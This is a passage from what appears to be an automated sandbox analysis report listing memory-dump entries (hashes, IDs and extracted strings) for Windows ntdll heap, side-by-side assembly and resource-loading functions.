            • Instruction Fuzzy Hash: 3E810475B91200FFCF25AB15AE86D6B3B76AF86B56F01C045F0082F653D3A18801D6B6
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00A5AAC8
            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00A5AC0A
            • RtlpResolveAssemblyStorageMapEntry, xrefs: 00A5AC27
            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00A5AAA0
            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00A5A8EC
            • @, xrefs: 00A5ABA3
            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00A5AB0E
            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00A5ABF3
            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00A5AA1A
            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00A5AA11
            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00A5AC2C
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
            • API String ID: 0-4009184096
            • Opcode ID: a1b2544941db112d140648c578058432fe80cfd2b9ddfa5007833ead7ebd0263
            • Instruction ID: 87bbb31dc924f3a7fa959fda08cf94f53b99b43087f0a0b9bac442de12852a17
            • Opcode Fuzzy Hash: a1b2544941db112d140648c578058432fe80cfd2b9ddfa5007833ead7ebd0263
            • Instruction Fuzzy Hash: 9D0260B1E402289BDB21DB14CD81BDAB7B8AF54715F4041EAEA0DA7241D7709FC8CF99
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
            • API String ID: 0-3591852110
            • Opcode ID: de477c682be9befc3ac3010afa0efc44dff36fe8d801793a04ab1096771dd58b
            • Instruction ID: 5fce10ef43fd5ba2812d7d41fea3b2eb5054614cd459a78d82b8c678b2e2aa64
            • Opcode Fuzzy Hash: de477c682be9befc3ac3010afa0efc44dff36fe8d801793a04ab1096771dd58b
            • Instruction Fuzzy Hash: 71129C306046429FDB25CF69C495BBAB7F1FF8A714F148459F48A8B682D7B4EC80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
            • API String ID: 0-1357697941
            • Opcode ID: 2f7a9a61f166e58ffb079a62860c1eded774260fb2c4ee0c5d10664745467f61
            • Instruction ID: 9ca593062a6efbab5991775d0f8aad3cd7e9daf7bd103dd7b524b710e287e4c7
            • Opcode Fuzzy Hash: 2f7a9a61f166e58ffb079a62860c1eded774260fb2c4ee0c5d10664745467f61
            • Instruction Fuzzy Hash: 19F10131A006869FCB25CF69C495BAAB7F5FF8E314F14802AF04697681C7B4ED85CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
            • API String ID: 0-2224505338
            • Opcode ID: a802d53b71f503e56f5bcc992dd465135093ad06352663166f92016668492bbc
            • Instruction ID: c58ae8ffef8bfb514b814c20ffd582470711665a9a4e2a395d6a730fc0dbecc3
            • Opcode Fuzzy Hash: a802d53b71f503e56f5bcc992dd465135093ad06352663166f92016668492bbc
            • Instruction Fuzzy Hash: 8B510733646284EFCB12DF99C896F6A73B4EB49B64F14C02EF406AB681C771DE40C612
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • sxsisol_SearchActCtxForDllName, xrefs: 00A4D406
            • Internal error check failed, xrefs: 00A4D441, 00A4D5F2
            • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00A4D432
            • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00A4D417
            • @, xrefs: 00A029C7
            • minkernel\ntdll\sxsisol.cpp, xrefs: 00A4D43C, 00A4D5ED
            • Status != STATUS_NOT_FOUND, xrefs: 00A4D5E3
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
            • API String ID: 0-761764676
            • Opcode ID: 5a9c2b883f96801f5f2988fe10dcd5931580c502d87d50a5c70ea5d3f2355c75
            • Instruction ID: d7c996daf62338731fecf7b365193d01b80af9f7e47cdfbe6ec963b2c927c895
            • Opcode Fuzzy Hash: 5a9c2b883f96801f5f2988fe10dcd5931580c502d87d50a5c70ea5d3f2355c75
            • Instruction Fuzzy Hash: 7E128F74A002299FDB24CF58D885BBEB7F5EF58714F15806AE849EB281E734EC41CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$MUI$R$T${
            • API String ID: 0-2515562510
            • Opcode ID: e397e3163b7f89f91d6c3a5162d9144a4c6073a0162c8139948b457be14f64d6
            • Instruction ID: f98e0269700cfe1331219ac6d87594df6088949f1d8d5308057e41f1f52b3600
            • Opcode Fuzzy Hash: e397e3163b7f89f91d6c3a5162d9144a4c6073a0162c8139948b457be14f64d6
            • Instruction Fuzzy Hash: B1923A71E08229CFDB64CF98C880BEDB7B6BF45344F258259E859AB241DB389D85CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-523794902
            • Opcode ID: 787977c6abec68cc2d6e83631624ede38d66fc58750565a772601ce06f7f6d1b
            • Instruction ID: b90c2853ff0d011d3450d33b5e238fef3c71592d2dc84ce37f355477ebbf1af9
            • Opcode Fuzzy Hash: 787977c6abec68cc2d6e83631624ede38d66fc58750565a772601ce06f7f6d1b
            • Instruction Fuzzy Hash: 0C42DB316087859FC715CF28D884B2ABBE5BF98704F14896DF8868B392D734ED85CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SsHd, xrefs: 00A02EF4
            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00A4D758
            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00A4D724
            • Actx , xrefs: 00A4D76A, 00A4D7D1
            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 00A4D809
            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00A4D71F, 00A4D753
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
            • API String ID: 0-1988757188
            • Opcode ID: ee8bad55f116c152083f78da0d6cc44b364e5024d43a4d693ba82dbfa0ebc066
            • Instruction ID: 86b7098ff677e8b9a6f40a06a629f8a3d15f6f275ef838b3d373f6a954372938
            • Opcode Fuzzy Hash: ee8bad55f116c152083f78da0d6cc44b364e5024d43a4d693ba82dbfa0ebc066
            • Instruction Fuzzy Hash: 06E1E17560430A8FDB24CF28D888B2ABBF5AB88354F14462EF856CB2D1D731DD45CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
            • API String ID: 0-1745908468
            • Opcode ID: cc8cc3faac25ac436564c390c58a8f3d367d34c0f10760397828483ae597c39f
            • Instruction ID: af95ffd39565117d336f5a1554c72ecfc7d998ad5ecb8bed65120916326efbb0
            • Opcode Fuzzy Hash: cc8cc3faac25ac436564c390c58a8f3d367d34c0f10760397828483ae597c39f
            • Instruction Fuzzy Hash: E191D131A016809FCB26DFA8C451BADBBF2BF8A710F18805DF4465B6D2C7329D92CB11
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: '$(null)$(null)
            • API String ID: 0-1087929977
            • Opcode ID: 8730000283683bc95b64901e37dea20531b8ac03ccb8197b4b14ccfbfe28e0fa
            • Instruction ID: dff098367fa6b6436d13b834d4fcad11237d71dfc09fdd207785c244d302809c
            • Opcode Fuzzy Hash: 8730000283683bc95b64901e37dea20531b8ac03ccb8197b4b14ccfbfe28e0fa
            • Instruction Fuzzy Hash: 9932A3F1E002289BDB348F28CD847AAB7B5AB44314F5481EDF659A7281D7B48EC5CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00A5A7A7
            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00A5A7C7
            • RtlGetAssemblyStorageRoot, xrefs: 00A5A768, 00A5A7A2, 00A5A7C2
            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00A5A788
            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00A5A780
            • SXS: %s() passed the empty activation context, xrefs: 00A5A76D
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
            • API String ID: 0-861424205
            • Opcode ID: cd384eb047a08e6eb6540d3520c450127a9c79f148b7606c7651e9ce6124ea0d
            • Instruction ID: b05d1a84f0ee841e3cfa035a26ec7d2f2dccce05588ae0256af351b7ed1d3756
            • Opcode Fuzzy Hash: cd384eb047a08e6eb6540d3520c450127a9c79f148b7606c7651e9ce6124ea0d
            • Instruction Fuzzy Hash: 74313836F80224BBEB209B55CC42FAAB779EF65B65F048155FD14B7281D2B09E00C7E2
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
            • API String ID: 0-3393094623
            • Opcode ID: 1c7425bbb65723983339642934ee3d881abc0d13ab169b496fe45999d8793a41
            • Instruction ID: 4f1c20132b39c98e8ab2b3b3d978efc5f4c12b59a38b468c41c94bfb18ef8afd
            • Opcode Fuzzy Hash: 1c7425bbb65723983339642934ee3d881abc0d13ab169b496fe45999d8793a41
            • Instruction Fuzzy Hash: 23028C759083598BD724CF24D488BABB7E4BFC8704F14892EE99997290E774D848CB93
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
            • API String ID: 0-2518169356
            • Opcode ID: 264faa90d7274904fb0eb3578e57a5f33970eeefa84e556fc9573c4cd68b00eb
            • Instruction ID: 2e853ca044f358eb7e63114252714b30ee661002bcf4cb4653f334c21754c940
            • Opcode Fuzzy Hash: 264faa90d7274904fb0eb3578e57a5f33970eeefa84e556fc9573c4cd68b00eb
            • Instruction Fuzzy Hash: 7191B072D106299BCB21CFA8C881AAEB7B0FF58710F194169E815FB350D735DE41CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Item:$ Language:$ Name:$SR - $Type:
            • API String ID: 0-3082644519
            • Opcode ID: 296e0ff3f619cf59e165a4b69041df4ba3d33eda7f98a1c63c8fbe3f60a35723
            • Instruction ID: 4ac32e3ffcfc1b69758a48bcd93a111e20aa61a09b2a064b0bdd999b2eb6f9fd
            • Opcode Fuzzy Hash: 296e0ff3f619cf59e165a4b69041df4ba3d33eda7f98a1c63c8fbe3f60a35723
            • Instruction Fuzzy Hash: 39418071A006286BCB24DB69CD59BEAB7BCAF45304F4481E6B54CA7241DE30DE84CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
            • API String ID: 0-188067316
            • Opcode ID: 59efaef6271355cd56c9111aa4929e97696a2bb393973a39c2b33c4945e7e81d
            • Instruction ID: 1759114b5ae31f234c619ce5d822c0dde1cac9834af3b15956949bb5f507f33e
            • Opcode Fuzzy Hash: 59efaef6271355cd56c9111aa4929e97696a2bb393973a39c2b33c4945e7e81d
            • Instruction Fuzzy Hash: 4E01FC3651A281AFD3169B69E41EF9377A4DBC1B34F29806EF2055B681CBB4DC40D112
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: c3f2a5228ab60fa1204d4659c0b23f1b8702dd085539476de3a585acdd355553
            • Instruction ID: f6482063a302ac31e19017c2aa8227c2f21afbaa8b154722489eb6e2e1ecffb6
            • Opcode Fuzzy Hash: c3f2a5228ab60fa1204d4659c0b23f1b8702dd085539476de3a585acdd355553
            • Instruction Fuzzy Hash: 12239D74E00619DFDB18CF68D490BAABBF1BF49304F2481A9E44AAB381D735AD51CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
            • API String ID: 2994545307-3570731704
            • Opcode ID: 807502d601534d3fbd21b21791a079d1e33a9845a30d71d9b5c54b18443f7d30
            • Instruction ID: a65a17358c0bb59484bd88ea3c5c49f8c6541b5808e549af2f54931accc1ff95
            • Opcode Fuzzy Hash: 807502d601534d3fbd21b21791a079d1e33a9845a30d71d9b5c54b18443f7d30
            • Instruction Fuzzy Hash: 9D823470E01628CFEB24CB28C991FA9B7B5BF45310F1581EAE949AB291D7709EC4CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: #$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
            • API String ID: 0-3266796247
            • Opcode ID: bc0702739b508e0136086fe5719c79849060b856c32e25a4b947dedc37ae99bd
            • Instruction ID: e269782c7026f44cfe75447f7448519245600cab94cde2b596d471ff8fa123ff
            • Opcode Fuzzy Hash: bc0702739b508e0136086fe5719c79849060b856c32e25a4b947dedc37ae99bd
            • Instruction Fuzzy Hash: 6832AA31A082698BDF26CF18C884BEDB7B5BF45340F2451EAE849AB251DB349EC5DF50
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00A4DA2C
            • SsHd, xrefs: 00A033A5
            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00A4D9F6
            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00A4DA49
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
            • API String ID: 0-2905229100
            • Opcode ID: 9646d3299df3a33dade41f9c400959749448f6d9382e62550684d254c5209a21
            • Instruction ID: 63615db508711e4f752a79241935ba766581bf6a6dd4258bcdd2d53141651a27
            • Opcode Fuzzy Hash: 9646d3299df3a33dade41f9c400959749448f6d9382e62550684d254c5209a21
            • Instruction Fuzzy Hash: 39D18F76A00219DFCF25CF98D890AADB7B9EF48304F14806AE805AF391D772ED45CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A522D7, 00A523E7
            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00A522F3
            • HEAP: , xrefs: 00A522E6, 00A523F6
            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00A52403
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
            • API String ID: 0-1657114761
            • Opcode ID: bdf708305273ae8ab5c520bf43f2d6fd76c9c878bbf6f341ee0f1821c29a0633
            • Instruction ID: 51865a09695a5a55cf952f96640166c233c0c73f85c631ec15428b05d7e98794
            • Opcode Fuzzy Hash: bdf708305273ae8ab5c520bf43f2d6fd76c9c878bbf6f341ee0f1821c29a0633
            • Instruction Fuzzy Hash: 57D1CD70A007498FDB18CF68D590BBAB7F1FF69310F258169E85A9B381E334AC45CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00A5A8BE
            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00A5A7E1, 00A5A8B9
            • SXS: %s() passed the empty activation context, xrefs: 00A5A7E6
            • .Local, xrefs: 00A1C9A4
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
            • API String ID: 0-1239276146
            • Opcode ID: 4e21520474af3886c0e0e2a7f6736dcb9079b5d0056c02f1c304eef3ff4e6ce3
            • Instruction ID: d11ce0f4971e0a6bf192834f16e31265f2120133c7479fa588a318d9f3d2ed6e
            • Opcode Fuzzy Hash: 4e21520474af3886c0e0e2a7f6736dcb9079b5d0056c02f1c304eef3ff4e6ce3
            • Instruction Fuzzy Hash: 06A18235A80229DBDB24CF64DC84BE9B3B5BF68324F1541E9E809AB251D7309EC1CF95
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$MUI${
            • API String ID: 0-3203766739
            • Opcode ID: 2a5c0731c597cd4f62681363aa6d1f5f9259eb39504425382648cdde38d5bf20
            • Instruction ID: 3e55c0cb4b1ed5c2dad3f680fae142a43b8d50faf73fdf351c457af2f4046edb
            • Opcode Fuzzy Hash: 2a5c0731c597cd4f62681363aa6d1f5f9259eb39504425382648cdde38d5bf20
            • Instruction Fuzzy Hash: 5D81BC31A08619CBDB25CF68C844BEE77B1FF05354F299195E811AB2D0DB789EC4CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00A53513
            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00A5348D
            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00A5344A
            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00A534D0
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
            • API String ID: 0-1468400865
            • Opcode ID: 03c0be877c4ac70f9e6c479786a628275ce751b549b1e6276ec094b78646003c
            • Instruction ID: 307e2d37cd85dbd45231a5942ded5cd8955a5bde49312af2623b75bf48fbb98c
            • Opcode Fuzzy Hash: 03c0be877c4ac70f9e6c479786a628275ce751b549b1e6276ec094b78646003c
            • Instruction Fuzzy Hash: 9471E3B2904308AFCB10DF54D986B977FA8AF98794F504868FD494B182D774D988CBD1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
            • API String ID: 2994545307-2586055223
            • Opcode ID: 5df6fbba423ac2b72a5945ccb195ecc473007fc77b0633acb2644fa24500843b
            • Instruction ID: 9193bf4d6305a4706bd0e7654ecffc72ea3418a189c02a1951c53043d76aa277
            • Opcode Fuzzy Hash: 5df6fbba423ac2b72a5945ccb195ecc473007fc77b0633acb2644fa24500843b
            • Instruction Fuzzy Hash: A251EC32205684AFD322DB68D945F7B77F8FB94B50F180468F8558B2E2D735E804CB62
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
            • API String ID: 2994545307-336120773
            • Opcode ID: f57a82b9080327587243995785e594f1cd20d2aec44c818b68e0983e0bf85f29
            • Instruction ID: ac85c4125e7ad40543daf43577733acb1f9f2267f9c8470916f96231bc86b185
            • Opcode Fuzzy Hash: f57a82b9080327587243995785e594f1cd20d2aec44c818b68e0983e0bf85f29
            • Instruction Fuzzy Hash: 8C310631685150EFC711DB99C886F6773E8EF8A7A4F24406AF405DB2D2D7B0ED40C659
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
            • API String ID: 0-1391187441
            • Opcode ID: fcafd0d60978d40caa273be64d6db898bda32d5391cb1e97a532413a6f373332
            • Instruction ID: 5f618d94f237a566166a9fd9d383ce6697aa56da4cea8e4d07d1f0ef414cc4c9
            • Opcode Fuzzy Hash: fcafd0d60978d40caa273be64d6db898bda32d5391cb1e97a532413a6f373332
            • Instruction Fuzzy Hash: 6431B436A04255AFCB12DB9ACC85FAFB7B8EB84730F158065F815A7291D770ED40CB62
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
            • API String ID: 0-4256168463
            • Opcode ID: 69082c9c40176d16008c82b171a8c8d8e6be6856083a4663e8873bcb88a7ceba
            • Instruction ID: 6c8788a2429ab032bf1aa87b1a78940229a8b05ef29f23be5dee2dc30246516b
            • Opcode Fuzzy Hash: 69082c9c40176d16008c82b171a8c8d8e6be6856083a4663e8873bcb88a7ceba
            • Instruction Fuzzy Hash: 5C01D6379512019FCF21EF6D8546FA673E8EB86720F14846AF4069B7C2DB71EE40CA51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: &$&$&
            • API String ID: 0-3101051865
            • Opcode ID: 0eb0923fde85fcd716fa0e467bd7addbe43a76c40a891abfced1ee4124c87454
            • Instruction ID: 21da9edcdc1709796d5112ee5714e19c8849e7a228f0c68eb5ca749245a30b2f
